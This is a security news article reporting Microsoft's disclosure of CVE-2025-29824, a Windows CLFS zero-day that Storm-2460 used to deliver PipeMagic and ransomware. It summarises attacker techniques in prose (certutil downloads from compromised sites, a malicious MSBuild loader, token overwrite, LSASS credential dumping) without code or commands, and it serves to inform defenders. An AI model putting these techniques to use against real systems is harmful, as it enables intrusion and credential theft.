Windows Zero-Day Used to Spread PipeMagic Ransomware Before Patch

Microsoft has revealed that a security flaw in the Windows Common Log File System (CLFS) was being actively exploited as a zero-day. The good news? It's patched now. The bad news? It was used in targeted ransomware attacks.

According to Microsoft, these attacks targeted "organizations in the information technology (IT) and real estate sectors of the United States, the financial sector in Venezuela, a Spanish software company, and the retail sector in Saudi Arabia." You can read their full report here.

The vulnerability, tracked as CVE-2025-29824, is a privilege escalation bug. Think of it as a sneaky way for attackers to gain SYSTEM-level access. Microsoft rolled out a fix as part of their April 2025 Patch Tuesday update.

Microsoft is calling the group behind these attacks Storm-2460. They're using a piece of malware called PipeMagic to deliver the exploit, along with the ransomware itself.

So, how are they getting in? The initial access method is still under investigation. However, researchers have spotted the attackers using the `certutil` utility to download malware from legitimate, but compromised, third-party sites.

This malware is actually a malicious MSBuild file. It contains an encrypted payload which, once unpacked, launches PipeMagic. This plugin-based Trojan has been around since 2022.

Interestingly, CVE-2025-29824 isn't the first zero-day delivered via PipeMagic. CVE-2025-24983, a Windows Win32 Kernel Subsystem privilege escalation bug, was delivered the same way and patched last month.

And before that? PipeMagic was linked to Nokoyawa ransomware attacks, exploiting yet *another* CLFS zero-day (CVE-2023-28252).

Kaspersky noted back in April 2023 that victims were infected with PipeMagic through an MSBuild script *before* the CLFS exploit was even used.

One bright spot: Windows 11, version 24H2, isn't affected. Access to certain System Information Classes within NtQuerySystemInformation is restricted to users with SeDebugPrivilege, which is usually limited to admin-like users.

According to Microsoft, "The exploit targets a vulnerability in the CLFS kernel driver... The exploit then utilizes a memory corruption and the RtlSetAllBits API to overwrite the exploit process's token with the value 0xFFFFFFFF, enabling all privileges for the process, which allows for process injection into SYSTEM processes." (Technical, we know, but important!)

After a successful exploit, the attackers grab user credentials by dumping the memory of LSASS, then encrypt files, giving them a random extension.

Microsoft hasn't been able to get their hands on a ransomware sample, but they did find that the ransom note included a TOR domain linked to the RansomEXX ransomware family.

Microsoft emphasizes that "Ransomware threat actors value post-compromise elevation of privilege exploits because these could enable them to escalate initial access... into privileged access. They then use privileged access for widespread deployment and detonation of ransomware within an environment." In other words, they are looking for any advantage they can get!